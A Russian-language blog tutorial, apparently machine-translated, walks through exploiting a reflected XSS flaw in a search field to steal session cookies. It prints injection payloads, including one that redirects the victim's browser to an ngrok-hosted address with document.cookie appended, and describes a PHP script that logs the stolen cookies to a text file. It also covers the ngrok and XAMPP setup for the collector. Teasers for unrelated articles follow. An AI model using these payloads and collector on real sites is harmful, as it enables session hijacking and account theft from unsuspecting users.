Привет всем :), здесь я продемонстрирую получение cookies, которые будут сохранены в виде txt файла, используя дефект XSS Reflected.
Ранее, что такое XSS? XSS расшифровывается как Cross-site Scripting, что представляет собой атаку путем внедрения вредоносного кода, который может получать cookies пользователя. Очень смертельным типом атаки является xss-хранилище, когда вредоносный код внедряется в систему, и код будет постоянно отправлять cookies посетителей хакерам.
Хорошо, следующим шагом я попробую сделать тест сначала на всех полях ввода, которые могут получить недостаток xss
Теперь здесь я попробую проверить раздел поиска
После того, как я ввел текст, оказалось, что текст выводится в секции inspect element
На следующем этапе я проведу тестирование, и это я буду делать шаг за шагом.
Получается, что после того, как я добавлю закрытие и открытие в начале и конце команды html-инъекции
"><img src=x onerror=alert(1)><"
Получается, что она может отобразить xss уязвимость, которая помечена всплывающим окном, успешно отображенным.
Итак, способ, которым работает моя html-инъекция, заключается в том, что когда src или источник img или изображения отсутствует, то выполняется команда onerror, которая запускает предупреждение, отображающее всплывающее окно из javascript, содержащее значение номер 1. Позже мы изменим это значение section.....
> в начале и <" в конце полезны для того, чтобы html-код, который я ввожу, не читался как текст.
Проблема в том, что если не поставить заглавную букву в начале и в конце, то html-команда, которую я ввожу, будет прочитана как текст и не сможет выполниться.
Далее я попытался выполнить команду для получения cookies
"><img src=x onerror=alert(document.cookie)><"
Далее мы сначала настроим ngrok, чтобы наш локальный сервер был доступен онлайн
Итак, я запускаю ngrok в cmd, и активирую локальный сервер командой
Ngrok http 80
Итак, локальный ip-сервер может быть доступен публично, подождите... Не забудьте сначала проверить, активирован ли локальный веб-сервер или нет.
Здесь я использую Xampp и активировал веб-сервер Apache.
После этого, пожалуйста, проверьте сначала доступ к локальному веб-серверу публично
После этого появится вот такой вид, затем нажмите посетить сайт
Здесь я уже могу получить доступ к файлам на моем локальном веб-сервере, и пришло время действовать.....
Здесь я подготовил php файл, содержащий код для получения cookies, которые я позже сохраню в txt виде
Итак, объяснение следующее,
C - это контейнер cookie, который будет вызван из команды html-инъекции позже
$_GET - метод http-запроса
$cookie - переменная, в которой хранятся методы и файлы cookie
Cookielog.txt - это txt-файл, в котором будет храниться информация о куках в виде текста
A - это своего рода временная переменная, место для записи каждого куки.
Fopen - это функция ассоциативного массива, полезная для открытия файла cookielog.txt и a
$file - переменная
Fwrite - функция для записи информации из $cookie в $file, а в $cookie будет добавлена \n\n\n информация для ввода 2x или как разделитель для каждой cookie
Я сохраняю файл с именем pemulung.php, доступ к которому впоследствии будет осуществляться с помощью ngrok
"><img src=x onerror=alert(document.location = "https://157b-36-68-222-204.ap.ngrok.io/wkwk/pemulung.php?c="+document.cookie)><"
После того, как я введу код выше, cookie будет сохранен в файле cookielog.txt
А вот как это выглядит в браузере
Тогда отображение на body не будет отображать никакого содержимого и будет отображать только head, и уж точно не стоит ожидать, что мы увидим отображение формы на элементе inspect... Проблема здесь в том, что веб будет писать в соответствии с кодом, который я инжектировал ранее.....
Таким образом, можно сделать вывод, что если команда, которую мы ввели, успешна, то ответ будет равен 200, что можно увидеть в http-запросе ngrok. Если мы выполним инъекцию много раз, то cookielog.txt будет заполнен таким количеством cookies, сколько раз мы выполним инъекцию.
На этом все спасибо, прошу извинить за возможные недочеты. Как обычный человек, я хотел бы выразить свою глубочайшую благодарность... :) :) :) :)
20.03.2023 14:01
Веб-скрейпинг, как мы все знаем, это дисциплина, которая развивается с течением времени. Появляются все более сложные средства борьбы с ботами, а также новые инструменты веб-скраппинга с открытым исходным кодом для их обхода.
20.03.2023 12:24
Чтобы запустить этот код и рассчитать CGPA, необходимо сохранить код как HTML-файл, а затем открыть его в веб-браузере. Для этого выполните следующие действия:
20.03.2023 11:15
О тренинге HTML JavaScript :HTML (язык гипертекстовой разметки) и CSS (каскадные таблицы стилей) - две основные технологии для создания веб-страниц. HTML обеспечивает структуру страницы CSS (визуальное и звуковое) оформление для различных устройств. Наряду с графикой и сценариями HTML и CSS являются...
20.03.2023 08:46
Вам когда-нибудь требовалось собрать/развернуть только часть вашего приложения Angular или, возможно, скрыть некоторые маршруты в определенных средах?
19.03.2023 13:43
Установщик веб-платформы, предлагаемый компанией Microsoft, перестанет работать 31 декабря 2022 года. Его закрытие привело к тому, что мы не можем запускать наши php-файлы через localhost на наших компьютерах. Мне с трудом удалось установить его и я решил поделиться этой статьей, чтобы помочь тем,...
19.03.2023 13:03
При использовании компонентов React в сочетании с Context вы можете оптимизировать рендеринг, обернув ваш компонент React в React.memo сразу после поставщика контекста. Это позволит избежать ненужных повторных рендеров.